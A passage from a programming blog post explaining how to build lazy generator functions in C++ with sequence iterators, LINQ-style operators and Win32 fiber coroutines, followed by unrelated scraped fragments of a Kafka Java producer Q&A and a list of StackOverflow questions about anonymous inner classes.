current value or until the function returns. Putting all together, we can begin to write some code for the sequence_iterator class: template<typename T> class sequence_iterator { public: typedef ??? functor; sequence_iterator(functor func) { // initializes the iterator from the generator functors, executes the functors // until it terminates or yields. } sequence_iterator() : _func(func) { // must represent the end of the sequence } bool operator == (const sequence_iterator& rhs) { // true if the iterators are at the same position. } bool operator != (const sequence_iterator& rhs) { return !(*this==rhs); } const T& operator * () const { return _currentVal; } sequence_iterator operator ++ () { // resume execution return *this; } private: T _currentVal; }; The behavior of the iterator is fairly straightforward, but there are a few interesting things to note. The first is that evidently a generator function does not do what it says: looking at the code of the fibonacci() function there is no statement that actually returns a sequence<T>; what the code does is simply to yield the sequence elements, one at the time. So who creates the sequence<T> object? Clearly, the implementation of generators cannot be purely library-based. We can put in a library the code for the sequence<T> and for its iterators, we can also put in a library the platform-dependent code that manages the suspension and resumptions of generators. But it will be up to the compiler to generate the appropriate code that creates a sequence<T> object for a generator function. More on this later. Also, we should note that there is no asynchrony or concurrency involved in this process. The function could resume in the same thread where it suspended. Generators as coroutines The next step is to implement the logic to seamlessly pause and resume a generator. A generator can be seen as an asymmetric coroutine, where the asymmetry lies in the fact that the control can be only yielded back to the caller, contrary to the case of symmetric coroutines that can yield control to any other coroutine at any time. Unfortunately coroutines cannot be implemented in a platform-independent way. In Windows we can use Win32 Fibers (as I described in this very old post) while on POSIX, you can use the makecontext()/swapcontext() API. There is also a very nice Boost library that we could leverage for this purpose. But let’s ignore the problems of portability, for the moment, and assume that we have a reliable way to implement coroutines. How should we use them in an iterator? We can encapsulate the non-portable code in a class __resumable_func that exposes this interface: template <typename TRet> class __resumable_func { typedef std::function<void(__resumable_func&)> TFunc; public: __resumable_func(TFunc func); void yieldReturn(const TRet& value); void yieldBreak(); void resume(); const TRet& getCurrent() const; bool isEos() const; } The class is templatized on the type of the values produced by the generator and provides methods to yield one value (yieldReturn()), to retrieve the current value (i.e., the latest value yielded) and to resume the execution and move to the next value. It should also provide methods to terminate the enumeration (yieldBreak()) and to tell if we have arrived at the end of the sequence (isEos()). The function object passed to the constructor represents the generator function itself that we want to run. More precisely, it is the function that will be executed as a coroutine, and its prototype tells us that this function, in order to be able to suspend execution, needs a reference to the __resumable_func object that is running the coroutine itself. In fact the compiler should transform the code of a generator into the (almost identical) code of a lambda that uses the __resumable_func object to yield control and emit a new value. For example, going back again to our fibonacci() generator, we could expect the C++ compiler to transform the code we wrote: sequence<int> fibonacci() resumable { int a = 0; int b = 1; while (true) { yield b; int tmp = a + b; a = b; b = tmp; } } into this lambda expression: auto __fibonacci_func([](__resumable_func<int>& resFn) { int a = 0; int b = 1; while (true) { resFn.yieldReturn(b); int tmp = a + b; a = b; b = tmp; } }); where the yield statement has been transformed into a call to __resumable_func::yieldReturn(). Likewise, client code that invokes this function, like: sequence<int> fibs = fibonacci(); should be transformed by the compiler into a call to the sequence constructor, passing this lambda as argument: sequence<int> fibs(__fibonacci_func); Sequence iterators We can ignore the details of the implementation of __resumable_func<T> coroutines for the moment and, assuming that we have them working, we can now complete the implementation of the sequence_iterator class: template <typename T> class sequence_iterator { std::unique_ptr<__resumable_func<T>> _resumableFunc; sequence_iterator() : _resumableFunc(nullptr) { } sequence_iterator(const std::function<void(__resumable_func<T>&)> func) : _resumableFunc(new __resumable_func<T>(func)) { } sequence_iterator(const sequence_iterator& rhs) = delete; sequence_iterator& operator = (const sequence_iterator& rhs) = delete; sequence_iterator& operator = (sequence_iterator&& rhs) = delete; public: sequence_iterator(sequence_iterator&& rhs) : _resumableFunc(std::move(rhs._resumableFunc)) { } sequence_iterator& operator++() { _ASSERT(_resumableFunc != nullptr); _resumableFunc->resume(); return *this; } bool operator==(const sequence_iterator& _Right) const { if (_resumableFunc == _Right._resumableFunc) { return true; } if (_resumableFunc == nullptr) { return _Right._resumableFunc->isEos(); } if (_Right._resumableFunc == nullptr) { return _resumableFunc->isEos(); } return (_resumableFunc->isEos() == _Right._resumableFunc->isEos()); } bool operator!=(const sequence_iterator& _Right) const { return (!(*this == _Right)); } const T& operator*() const { _ASSERT(_resumableFunc != nullptr); return (_resumableFunc->getCurrent()); } }; The logic here is very simple. Internally, a sequence_iterator contains a __resumable_func object, to run the generator as a coroutine. The default constructor creates an iterator that points at the end of the sequence. Another constructor accepts as argument the generator function that we want to run and starts executing it in a coroutine and the function will run until either it yields a value or terminates, giving the control back to the constructor. In this way we create an iterator that points at the beginning of the sequence. If a value was yielded, we can call the dereference-operator to retrieve it from the __resumable_func object. If the function terminated, instead, the iterator will already point at the end of the sequence. The equality operator takes care of equating an iterator whose function has terminated to the end()-iterators created with the default constructor. Incrementing the iterator means resuming the execution of the coroutine, from the point it had suspended, giving it the opportunity to produce another value. Note that, since the class owns the coroutine object, we disable copy constructors and assignment operators and only declare the move constructor, to pass the ownership of the coroutine. Composable sequence operators Almost there! We have completed our design, but there are still a few details to work out. The most interesting are related to the lifetime and copyability of sequence objects. What should happen with code like this? sequence<int> fibs1 = fibonacci(); sequence<int> fibs2 = fibs1; for (auto it1 : fibs1) { for (auto it2 : fibs2) { ... } } If we look at how we defined class sequence<T>, apparently there is no reason why we should prevent the copy of sequence objects. In fact, sequence<T> is an immutable class. Its only data member is the std::function object that wraps the functor we want to run. However, even though we don’t modify this functor object, we do execute it. This object could have been constructed from a lambda expression that captured some variables, either by value or by reference. Since one of the captured variables could be a reference to the same sequence<T> object that created that iterator, we need to ensure that the sequence object will always outlive its functors, and allowing copy-semantics suddenly becomes complicated. This brings us to LINQ and to the composability of sequences. Anyone who has worked with C# knows that what makes enumerable types truly powerful and elegant is the ability to apply chains of simple operators that transform the elements of a sequence into another sequence. LINQ to Objects is built on the concept of a data pipeline: we start with a data source which implements IEnumerable<T>, and we can compose together a number of query operators, defined as extension methods to the Enumerable class. For example, this very, very useless query in C# generates the sequence of all square roots of odd integers between 0 and 10: var result = Enumerable.Range(0, 10) .Where(n => n%2 == 1) .Select(n => Math.Sqrt(n)); Similarly, to make the C++ sequence<T> type really powerful we should make it composable and enrich it with a good range of LINQ-like operators to generate, filter, aggregate, group, sort and generally transform sequences. These are just a few of the operators that we could define in the sequence<T> class: template <typename T> class sequence { public: [...] static sequence<int> range(int from, int to); template <typename TResult> sequence<TResult> select(std::function<TResult(T)> selector); sequence<T> where(std::function<bool(T)> predicate); }; to finally be able to write the same (useless) query: sequence<double> result = sequence<int>::range(0, 10) .where([](int n) { return n => n%2 == 1; }) .select([](int n) { return sqrt(n); }); Let’s try to implement select(), as an experiment. It is conceptually identical to the lazy_tform() method  we saw before, but now defined in the sequence class. A very naïve implementation could be as follows: // Projects each element of a sequence into a new form. (NOT WORKING!) template <typename TResult> sequence<TResult> select(std::function<TResult(T)> selector) { auto func = [this, selector](__resumable_func<T>& rf) { for (T t : *this) { auto val = selector(t); rf.yieldReturn(val); } }; return sequence<TResult>(func); } It should be now clear how it works: first we create a generator functor, in this case with a lambda expression, and then we return a new sequence constructed on this functor. The point is that the lambda needs to capture the “parent” sequence object to be able to iterate through the values of its sequence. Unfortunately this code is very brittle. What happens when we compose more operators, using the result of one as the input of the next one in the chain? When we write: sequence<double> result = sequence<int>::range(0, 10) .where([](int n) { return n => n%2 == 1; }) .select([](int n) { return sqrt(n); }); there are (at least) three temporary objects created here, of type sequence<T>, and their lifetime is tied to that of the expression, so they are deleted before the whole statement completes. A chain of sequences The situation is like in the figure: the functor of each sequence in the chain is a lambda that has captured a pointer to the previous sequence object. The problem is in the deferred execution: nothing really happens until we enumerate the resulting sequence through its iterator, but as soon as we do so each sequence starts pulling values from its predecessor, which has already been deleted. Temporary objects and deferred execution really do not get along nicely at all. On one hand in order to compose sequences we have to deal with temporaries that can be captured in a closure and then deleted long before being used. On the other hand, the sequence iterators, and their underlying coroutines, should not be copied and can outlive the instance of the sequence that generated them. We can enforce move semantics on the sequence<T> class, but then what do we capture in a generator like select() that acts on a sequence? As often happens, a possible solution requires adding another level of indirection. We introduce a new class, sequence_impl<T>, which represents a particular application of a generator function closure: template <typename T> class sequence_impl { public: typedef std::function<void(__resumable_func<T>&)> functor; private: const functor _func; sequence_impl(const sequence_impl& rhs) = delete; sequence_impl(sequence_impl&& rhs) = delete; sequence_impl& operator = (const sequence_impl& rhs) = delete; sequence_impl& operator = (sequence_impl&& rhs) = delete; public: sequence_impl(const functor func) : _func(std::move(func)) {} sequence_iterator<T> begin() const { // return iterator for beginning of sequence return iterator(_func); } sequence_iterator<T> end() const { // return iterator for end of sequence return iterator(); } }; A sequence_impl<T> is neither copiable nor movable and only provides methods to iterate through it. The sequence<T> class now keeps only a shared pointer to the unique instance of a sequence_impl<T> that represents that particular application of the generator function. Now we can support chained sequences by allowing move semantics on the sequence<T> class. template <typename T> class sequence { std::shared_ptr<sequence_impl<T>> _impl; sequence(const sequence& rhs) = delete; sequence& operator = (const sequence& rhs) = delete; public: typedef typename sequence_impl<T>::iterator iterator; typedef typename sequence_impl<T>::functor functor; sequence(functor func) { _impl(std::make_shared<sequence_impl<T>>(func)) } sequence(sequence&& rhs) { _impl = std::move(rhs._impl); } sequence& operator = (sequence&& rhs) { _impl = std::move(rhs._impl); } iterator begin() const { return _impl->begin(); } iterator end() const { return _impl->end(); } }; The diagram below illustrates the relationships between the classes involved in the implementation of lazy sequences: genFunc2 LINQ operators Ok, now we have really almost done. The only thing left to do, if we want, is to write a few sequence-manipulation operators, modeled on the example of the LINQ-to-objects. I’ll list just a few, as example: // Determines whether all elements of a sequence satisfy a condition. bool all(std::function<bool(T)> predicate) { if (nullptr == predicate) { throw std::exception(); } for (auto t : *_impl) { if (!predicate(t)) { return false; } } return true; } // Returns an empty sequence static sequence<T> empty() { auto fn = [](__resumable_func<T>& rf) { rf.yieldBreak(); }; return sequence<T>(fn); } // Generates a sequence of integral numbers within a specified range [from, to). static sequence<int> range(int from, int to) { if (to < from) { throw std::exception(); } auto fn = [from, to](__resumable_func<T>& rf) { for (int i = from; i < to; i++) { rf.yieldReturn(i); } }; return sequence<int>(fn); } // Projects each element of a sequence into a new form. template <typename TResult> sequence<TResult> select(std::function<TResult(T)> selector) { if (nullptr == selector) { throw std::exception(); } std::shared_ptr<sequence_impl<T>> impl = _impl; auto fn = [impl, selector](__resumable_func<T>& rf) { for (T t : *impl) { auto val = selector(t); rf.yieldReturn(val); } }; return sequence<TResult>(fn); } // Returns a specified number of contiguous elements from the start of a sequence. sequence<T> take(int count) { if (count < 0) { throw std::exception(); } std::shared_ptr<sequence_impl<T>> impl = _impl; auto fn = [impl, count](__resumable_func<T>& rf) { auto it = impl->begin(); for (int i = 0; i < count && it != impl->end(); i++, ++it) { rf.yieldReturn(*it); } }; return sequence<T>(fn); } // Filters a sequence of values based on a predicate. sequence<T> where(std::function<bool(T)> predicate) { if (nullptr == predicate) { throw std::exception(); } std::shared_ptr<sequence_impl<T>> impl = _impl; auto fn = [impl, predicate](__resumable_func<T>& rf) { for (auto item : *impl) { if (predicate(item)) { rf.yieldReturn(item); } } }; return sequence<T>(fn); } We could write many more, but I think these should convey the idea. Example: a prime numbers generator As a final example, the following query lazily provides the sequence of prime numbers (smaller than INT_MAX), using a very simple, brute-force algorithm. It is definitely not the fastest generator of prime numbers, it’s maybe a little cryptic, but it’s undoubtedly quite compact! sequence<int> primes(int max) { return sequence<int>::range(2, max) .where([](int i) { return sequence<int>::range(2, (int)sqrt(i) + 2) .all([i](int j) { return (i % j) != 0; }); }); } Conclusion In this article I rambled about generators in C++, describing a new sequence<T> type that model lazy enumerators and that could be implemented as an extension of resumable functions, as specified in N3858. I have described a possible implementation based on coroutines and introduced the possibility of extending the sequence class with a set of composable operators. If you are curious and want to play with my sample implementation, you can find a copy of the sources here. Nothing too fancy, just the code that I showed in this post. Appendix – Coroutines in Win32 Having completed my long ramble on the “platform independent” aspects of C++ generators, it’s time to go back to the point we left open: how to implement, on Windows, the coroutines that we encapsulated in the __resumable_func class? We saw that the Visual Studio CTP comes with a first implementation of resumable functions, built over the PPL task library and using Win32 fibers as side-stacks. Even though the CTP does not support generator functions yet, my first idea was to just extend the <pplawait.h> library to implement them. However the code there is specialized for resumable functions that suspend awaitingfor some task, andit turns out that we can reuse only part of their code because, even if we are still dealing with resumable functions, the logic of await and yield are quite different. In the case of await, functions can be suspended (possibly multiple times) waiting for some other task to complete. This means switching to a fiber associated to the task after having set up a continuation that will be invoked after the task completes, to switch the control back to the current fiber. When the function terminates, the control goes back to the calling fiber, returning the single return value of the async resumable function. In the case of yield, we never suspend to call external async methods. Instead, we can suspend multiple times going back to the calling fiber, each time by returning one of the values that compose the sequence. So, while the implementation of the await keyword needs to leverage the support of PPL tasks, the concept of generator functions does not imply any concurrency or multithreading and using the PPL is not necessary. Actually, there are ways to implement yield with await) but I could not find a simple way to use the new __await keyword without spawning new threads (maybe this could be possible with a custom PPL scheduler?) So I chose to write the code for coroutines myself; the idea here is not very different from the one I described in a very old post (it looks like I keep rewriting the same post :-)) but now I can take advantage of the fiber-based code from the CTP’s <pplawait.h> library. Win32 Fibers Let’s delve into the details of the implementation.  Before all, let me summarize once again the Win32 Fiber API. Fibers were added to Windows NT to support cooperative multitasking. They can be thought as lightweight threads that must be manually scheduled by the application. In other words, fibers are a perfect tool to implement coroutines sequencing. When a fiber is created, with CreateFiber, it is passed a fiber-start function. The OS then assigns it a separate stack and sets up execution to begin at this fiber-start function. To schedule a fiber we need to “switch” to it manually with SwitchToFiber and once it is running, a fiber can then suspend itself only by explicitly yielding execution to another fiber, also by calling SwitchToFiber. SwitchToFiber only works from a fiber to another, so the first thing to do is to convert the current thread into a fiber, with ConvertThreadToFiber. Finally, when we have done using fibers, we can convert the main fiber back to a normal thread with ConvertFiberToThread. The __resumable_func class We want to put all the logic to handle the suspension and resumption of a function in the __resumable_func<T> class, as described before. In our case we don’t need symmetric coroutines; we just need the ability of returning control to the calling fiber. So our class will contain a handle to the “caller” fiber and a handle to the fiber we want to run. #include <functional> #include <pplawait.h> template <typename TRet> class __resumable_func : __resumable_func_base { typedef std::function<void(__resumable_func&)> TFunc; TFunc _func; TRet _currentValue; LPVOID _pFiber; LPVOID _pCallerFiber; Concurrency::details::__resumable_func_fiber_data* _pFuncData; public: __resumable_func(TFunc func); ~__resumable_func(); void yieldReturn(TRet value); void yieldBreak(); void resume(); const TRet& getCurrent() const const { return _currentValue; } bool isEos() const { return _pFiber == nullptr; } private: static void yield(); static VOID CALLBACK ResumableFuncFiberProc(PVOID lpParameter); }; The constructor stores a copy of the generator function to run, creates a new fiber object specifying ResumableFuncFiberProc as the function to execute, and immediately switches the execution to this fiber: __resumable_func(TFunc func) : _currentValue(TRet()), _pFiber(nullptr), _func(func), _pFuncData(nullptr) { // Convert the current thread to a fiber. This is needed because the thread needs to "be" // a fiber in order to be able to switch to another fiber. ConvertCurrentThreadToFiber(); _pCallerFiber = GetCurrentFiber(); // Create a new fiber (or re-use an existing one from the pool) _pFiber = Concurrency::details::POOL CreateFiberEx(Concurrency::details::fiberPool.commitSize, Concurrency::details::fiberPool.allocSize, FIBER_FLAG_FLOAT_SWITCH, &ResumableFuncFiberProc, this); if (!_pFiber) { throw std::bad_alloc(); } // Switch to the newly created fiber. When this "returns" the functor has either returned, // or issued an 'yield' statement. ::SwitchToFiber(_pFiber); _pFuncData->suspending = false; _pFuncData->Release(); } The fiber will start from the fiber procedure, which has the only task of running the generator function in the context of the fiber: // Entry proc for the Resumable Function Fiber. static VOID CALLBACK ResumableFuncFiberProc(PVOID lpParameter) { LPVOID threadFiber; // This function does not formally return, due to the SwitchToFiber call at the bottom. // This scope block is needed for the destructors of the locals in this block to fire // before we do the SwitchToFiber. { Concurrency::details::__resumable_func_fiber_data funcDataOnFiberStack; __resumable_func* pThis = (__resumable_func*)lpParameter; // The callee needs to setup some more stuff after we return (which would be either on // yield or an ordinary return). Hence the callee needs the pointer to the func_data // on our stack. This is not unsafe since the callee has a refcount on this structure // which means the fiber will continue to live. pThis->_pFuncData = &funcDataOnFiberStack; Concurrency::details::POOL SetFiberData(&funcDataOnFiberStack); funcDataOnFiberStack.threadFiber = pThis->_pCallerFiber; funcDataOnFiberStack.resumableFuncFiber = GetCurrentFiber(); // Finally calls the function in the context of the fiber. The execution can be // suspended by calling yield pThis->_func(*pThis); // Here the function has completed. We set return to true meaning this is the // final 'real' return and not one of the 'yield' returns. funcDataOnFiberStack.returned = true; pThis->_pFiber = nullptr; threadFiber = funcDataOnFiberStack.threadFiber; } // Return to the calling fiber. ::SwitchToFiber(threadFiber); // On a normal fiber this function won't exit after this point. However, if the fiber is // in a fiber-pool and re-used we can get control back. So just exit this function, which // will cause the fiber pool to spin around and re-enter. } There are two ways to suspend the execution of the generator function running in the fiber and to yield control back to the caller. The first is to yield a value, which will be stored in a data member: void yieldReturn(TRet value) { _currentValue = value; yield(); } The second is to immediately terminate the sequence, for example with a return statement or reaching the end of the function. The compiler should translate a return into a call to the yieldBreak method: void yieldBreak() { _pFiber = nullptr; yield(); } To yield the control we just need to switch back to the calling fiber: static void yield() { _ASSERT(IsThreadAFiber()); Concurrency::details::__resumable_func_fiber_data* funcDataOnFiberStack = Concurrency::details::__resumable_func_fiber_data::GetCurrentResumableFuncData(); // Add-ref's the fiber. Even though there can only be one thread active in the fiber // context, there can be multiple threads accessing the fiber data. funcDataOnFiberStack->AddRef(); _ASSERT(funcDataOnFiberStack); funcDataOnFiberStack->verify(); // Mark as busy suspending. We cannot run the code in the 'then' statement // concurrently with the await doing the setting up of the fiber. _ASSERT(!funcDataOnFiberStack->suspending); funcDataOnFiberStack->suspending = true; // Make note of the thread that we're being called from (Note that we'll always resume // on the same thread). funcDataOnFiberStack->awaitingThreadId = GetCurrentThreadId(); _ASSERT(funcDataOnFiberStack->resumableFuncFiber == GetCurrentFiber()); // Return to the calling fiber. ::SwitchToFiber(funcDataOnFiberStack->threadFiber); } Once we have suspended, incrementing the iterator will resume the execution by calling resume, which will switch to this object’s fiber: void resume() { _ASSERT(IsThreadAFiber()); _ASSERT(_pFiber != nullptr); _ASSERT(_pFuncData != nullptr); _ASSERT(!_pFuncData->suspending); _ASSERT(_pFuncData->awaitingThreadId == GetCurrentThreadId()); // Switch to the fiber. When this "returns" the functor has either returned, or issued // an 'yield' statement. ::SwitchToFiber(_pFiber); _ASSERT(_pFuncData->returned || _pFuncData->suspending); _pFuncData->suspending = false; if (_pFuncData->returned) { _pFiber = nullptr; } _pFuncData->Release(); } The destructor just needs to convert the current fiber back to a normal thread, but only when there are no more fibers running in the thread. For this reason we need to keep a per-thread fiber count, which is incremented every time we create a __resumable_funcand decremented every time we destroy it. ~__resumable_func() { if (_pCallerFiber != nullptr) { ConvertFiberBackToThread(); } } class __resumable_func_base { __declspec(thread) static int ts_count; protected: // Convert the thread to a fiber. static void ConvertCurrentThreadToFiber() { if (!IsThreadAFiber()) { // Convert the thread to a fiber. Use FIBER_FLAG_FLOAT_SWITCH on x86. LPVOID threadFiber = ConvertThreadToFiberEx(nullptr, FIBER_FLAG_FLOAT_SWITCH); if (threadFiber == NULL) { throw std::bad_alloc(); } ts_count = 1; } else { ts_count++; } } // Convert the fiber back to a thread. static void ConvertFiberBackToThread() { if (--ts_count == 0) { if (ConvertFiberToThread() == FALSE) { throw std::bad_alloc(); } } } }; __declspec(thread) int __resumable_func_base::ts_count = 0; And this is all we need to have resumable generators in C++, on Windows. The complete source code can be found here. 6 thoughts on “Generator functions in C++ Leave a Reply Fill in your details below or click an icon to log in: WordPress.com Logo You are commenting using your WordPress.com account. Log Out / Change ) Twitter picture You are commenting using your Twitter account. Log Out / Change ) Facebook photo You are commenting using your Facebook account. Log Out / Change ) Google+ photo You are commenting using your Google+ account. Log Out / Change ) Connecting to %s
__label__pos
0.992722
Shades88 Shades88 - 1 year ago 87 Java Question java client example for Kafka Producer, send method not accepting KeyedMessage I am running kafka 2.9.1-0.8.2.1. I included jars provided in libs/ directory within main kafka directory. Now I am trying to run a java producer example as per what is given here https://cwiki.apache.org/confluence/display/KAFKA/0.8.0+Producer+Example. Now producer.send method seems to be accepting this kind of argument Seq<KeyedMessage<String, String>> . In the example, object of KeyedMessage is not converted into anything. When I try to do the same I get incompatible types compiler error. Here's the code import kafka.producer.KeyedMessage; import kafka.producer.ProducerConfig; import java.util.Properties; import kafka.producer.Producer; import scala.collection.Seq; public class KakfaProducer { public static void main(String [] args) { Properties prop = new Properties(); prop.put("metadata.broker.list", "localhost:9092"); prop.put("serializer.class","kafka.serializer.StringEncoder"); //prop.put("partitioner.class", "example.producer.SimplePartitioner"); ProducerConfig producerConfig = new ProducerConfig(prop); Producer<String,String> producer = new <String,String>Producer(producerConfig); String topic = "test"; KeyedMessage<String,String> message = new <String,String>KeyedMessage(topic, "Hello Test message"); producer.send(message); producer.close(); } } And that commented code is giving me class def not found exception. I tried to look a lot on net, but it's not helping. There are two kinds of jars in that libs/ directory. One is kafka-client and other one is just kafka and version number. Am I including wrong jar? Which one do I need to work with? Answer Source For the first problem, instead of importing scala API, import Java one. So, instead of using: import kafka.producer.Producer; please use: import kafka.javaapi.producer.Producer; SimplePartitioner code can be found below. Add it to the corresponding directory: import kafka.producer.Partitioner; import kafka.utils.VerifiableProperties; public class SimplePartitioner implements Partitioner { public SimplePartitioner (VerifiableProperties props) { } public int partition(Object key, int numPartitions) { int partition = 0; String stringKey = (String) key; int offset = stringKey.lastIndexOf('.'); if (offset > 0) { partition = Integer.parseInt( stringKey.substring(offset+1)) % numPartitions; } return partition; } }
__label__pos
0.9931
Related Articles Related Articles Next higher number with same number of set bits • Difficulty Level : Hard • Last Updated : 07 Nov, 2019 Given a number x, find next number with same number of 1 bits in it’s binary representation. For example, consider x = 12, whose binary representation is 1100 (excluding leading zeros on 32 bit machine). It contains two logic 1 bits. The next higher number with two logic 1 bits is 17 (100012). Algorithm: When we observe the binary sequence from 0 to 2n – 1 (n is # of bits), right most bits (least significant) vary rapidly than left most bits. The idea is to find right most string of 1’s in x, and shift the pattern to right extreme, except the left most bit in the pattern. Shift the left most bit in the pattern (omitted bit) to left part of x by one position. An example makes it more clear, x = 156 10 x = 10011100 (2) 10011100 00011100 - right most string of 1's in x 00000011 - right shifted pattern except left most bit ------> [A] 00010000 - isolated left most bit of right most 1's pattern 00100000 - shiftleft-ed the isolated bit by one position ------> [B] 10000000 - left part of x, excluding right most 1's pattern ------> [C] 10100000 - add B and C (OR operation) ------> [D] 10100011 - add A and D which is required number 163 (10) After practicing with few examples, it easy to understand. Use the below given program for generating more sets. Program Design: We need to note few facts of binary numbers. The expression x & -x will isolate right most set bit in x (ensuring x will use 2’s complement form for negative numbers). If we add the result to x, right most string of 1’s in x will be reset, and the immediate ‘0’ left to this pattern of 1’s will be set, which is part [B] of above explanation. For example if x = 156, x & -x will result in 00000100, adding this result to x yields 10100000 (see part D). We left with the right shifting part of pattern of 1’s (part A of above explanation). There are different ways to achieve part A. Right shifting is essentially a division operation. What should be our divisor? Clearly, it should be multiple of 2 (avoids 0.5 error in right shifting), and it should shift the right most 1’s pattern to right extreme. The expression (x & -x) will serve the purpose of divisor. An EX-OR operation between the number X and expression which is used to reset right most bits, will isolate the rightmost 1’s pattern. A Correction Factor: Note that we are adding right most set bit to the bit pattern. The addition operation causes a shift in the bit positions. The weight of binary system is 2, one shift causes an increase by a factor of 2. Since the increased number (rightOnesPattern in the code) being used twice, the error propagates twice. The error needs to be corrected. A right shift by 2 positions will correct the result. The popular name for this program is same number of one bits. C++ filter_none edit close play_arrow link brightness_4 code #include<iostream>    using namespace std;    typedef unsigned int uint_t;    // this function returns next higher number with same number of set bits as x. uint_t snoob(uint_t x) {      uint_t rightOne;   uint_t nextHigherOneBit;   uint_t rightOnesPattern;      uint_t next = 0;      if(x)   {        // right most set bit     rightOne = x & -(signed)x;        // reset the pattern and set next higher bit     // left part of x will be here     nextHigherOneBit = x + rightOne;        // nextHigherOneBit is now part [D] of the above explanation.        // isolate the pattern     rightOnesPattern = x ^ nextHigherOneBit;        // right adjust pattern     rightOnesPattern = (rightOnesPattern)/rightOne;        // correction factor     rightOnesPattern >>= 2;        // rightOnesPattern is now part [A] of the above explanation.        // integrate new pattern (Add [D] and [A])     next = nextHigherOneBit | rightOnesPattern;   }      return next; }    int main() {   int x = 156;   cout<<"Next higher number with same number of set bits is "<<snoob(x);      getchar();   return 0; } chevron_right Java filter_none edit close play_arrow link brightness_4 code // Java Implementation on above approach class GFG {        // this function returns next higher  // number with same number of set bits as x. static int snoob(int x) {    int rightOne, nextHigherOneBit, rightOnesPattern, next = 0;    if(x > 0) {        // right most set bit     rightOne = x & -x;        // reset the pattern and set next higher bit     // left part of x will be here     nextHigherOneBit = x + rightOne;        // nextHigherOneBit is now part [D] of the above explanation.        // isolate the pattern     rightOnesPattern = x ^ nextHigherOneBit;        // right adjust pattern     rightOnesPattern = (rightOnesPattern)/rightOne;        // correction factor     rightOnesPattern >>= 2;        // rightOnesPattern is now part [A] of the above explanation.        // integrate new pattern (Add [D] and [A])     next = nextHigherOneBit | rightOnesPattern; }    return next; }    // Driver code public static void main (String[] args)  {     int x = 156;     System.out.println("Next higher number with same" +                     "number of set bits is "+snoob(x)); } }    // This code is contributed by mits chevron_right Python 3 filter_none edit close play_arrow link brightness_4 code # This function returns next # higher number with same  # number of set bits as x. def snoob(x):            next = 0     if(x):                    # right most set bit         rightOne = x & -(x)                    # reset the pattern and          # set next higher bit         # left part of x will          # be here         nextHigherOneBit = x + int(rightOne)                    # nextHigherOneBit is          # now part [D] of the          # above explanation.         # isolate the pattern         rightOnesPattern = x ^ int(nextHigherOneBit)                    # right adjust pattern         rightOnesPattern = (int(rightOnesPattern) /                              int(rightOne))                    # correction factor         rightOnesPattern = int(rightOnesPattern) >> 2                    # rightOnesPattern is now part         # [A] of the above explanation.                    # integrate new pattern          # (Add [D] and [A])         next = nextHigherOneBit | rightOnesPattern     return next    # Driver Code x = 156 print("Next higher number with " +        "same number of set bits is"                           snoob(x))    # This code is contributed by Smita chevron_right C# filter_none edit close play_arrow link brightness_4 code // C# Implementation on above approach using System; class GFG {        // this function returns next higher  // number with same number of set bits as x. static int snoob(int x) {        int rightOne, nextHigherOneBit,          rightOnesPattern, next = 0;            if(x > 0)     {                // right most set bit         rightOne = x & -x;                // reset the pattern and set next higher bit         // left part of x will be here         nextHigherOneBit = x + rightOne;                // nextHigherOneBit is now part [D]          // of the above explanation.                // isolate the pattern         rightOnesPattern = x ^ nextHigherOneBit;                // right adjust pattern         rightOnesPattern = (rightOnesPattern) / rightOne;                // correction factor         rightOnesPattern >>= 2;                // rightOnesPattern is now part [A]          // of the above explanation.                // integrate new pattern (Add [D] and [A])         next = nextHigherOneBit | rightOnesPattern;     }     return next; }    // Driver code static void Main()  {     int x = 156;     Console.WriteLine("Next higher number with same" +                       "number of set bits is " + snoob(x)); } }    // This code is contributed by mits chevron_right PHP filter_none edit close play_arrow link brightness_4 code <?php     // This function returns next higher number  // with same number of set bits as x. function snoob($x) {     $next = 0;            if($x)     {                // right most set bit         $rightOne = $x & - $x;                // reset the pattern and set next higher          // bit left part of x will be here         $nextHigherOneBit = $x + $rightOne;                // nextHigherOneBit is now part [D] of          // the above explanation.                // isolate the pattern         $rightOnesPattern = $x ^ $nextHigherOneBit;                // right adjust pattern         $rightOnesPattern = intval(($rightOnesPattern) /                                              $rightOne);                // correction factor         $rightOnesPattern >>= 2;                // rightOnesPattern is now part [A]          // of the above explanation.                // integrate new pattern (Add [D] and [A])         $next = $nextHigherOneBit | $rightOnesPattern;     }        return $next; }    // Driver Code $x = 156; echo "Next higher number with same "      "number of set bits is " . snoob($x);    // This code is contributed by ita_c ?> chevron_right Output: Next higher number with same number of set bits is 163 Usage: Finding/Generating subsets. Variations: 1. Write a program to find a number immediately smaller than given, with same number of logic 1 bits? (Pretty simple) 2. How to count or generate the subsets available in the given set? References: 1. A nice presentation here. 2. Hackers Delight by Warren (An excellent and short book on various bit magic algorithms, a must for enthusiasts) 3. C A Reference Manual by Harbison and Steele (A good book on standard C, you can access code part of this post here). Venki. Please write comments if you find anything incorrect, or you want to share more information about the topic discussed above. Attention reader! Don’t stop learning now. Get hold of all the important DSA concepts with the DSA Self Paced Course at a student-friendly price and become industry ready. My Personal Notes arrow_drop_up Recommended Articles Page :
__label__pos
0.885309
Anonymous Inner Classes are local classes that are declared and instantiated inline. learn more… | top users | synonyms 2 votes 1answer 25 views Is it possible to access getVal() function inside displayMsg() function? Is it possible to access the getVal() function inside displayMsg () function? I tried to create an annonymous inner-class with function getVal() and I want to call the getVal() function ... 0 votes 2answers 64 views using Anonymous inner class - conflicts in adding listeners and passing instances I am newbie in android and learning first time. I am making a very simple snippet something like when user clicks the button, the app should show a Toast message. I have read many tutorials on the ... 3 votes 2answers 141 views Can you create anonymous inner classes in Swift? I'm tired of declaring entire classes as having the ability to handle UIAlertView clicks by making them extend UIAlertViewDelegate. It starts to feel messy and wrong when I have multiple possible ... 11 votes 1answer 150 views Code behaves different after converting anonymous class to lambda I'm trying to refactor this code to use a lambda instead of anonymous class. It's a simple list of items in a GUI. I register a different listener to each item, and the last item created does ... 0 votes 1answer 41 views Trying to add ActionListener to a buttonArray I am not exactly sure what is wrong with my code but, in the process of adding the ActionListeners, I get the error : "local variables referenced from an inner class must be final or effectively ... 0 votes 4answers 63 views Field is declared as private but I'm able to access directly I have a class Foo which extends Dialog (SWT). I defined a data-member private Bazz bazz Within this class I defined a method called GetOkListener() which basically returns an SelectionListener ... 3 votes 5answers 63 views declaring function while instantiating a class I came across the following java code, and i am not sure what it means. Can we write code in '{' after we instantiate a class , eg new TestClass { */ code goes here */ } But when i try to run the ... 0 votes 2answers 44 views Getting inner class type name I'm trying to get the name of a type (which is an interface) that is instantiated within a class but the available methods I've tried do not return the actual name of the type. Example: To get the ... 3 votes 2answers 106 views 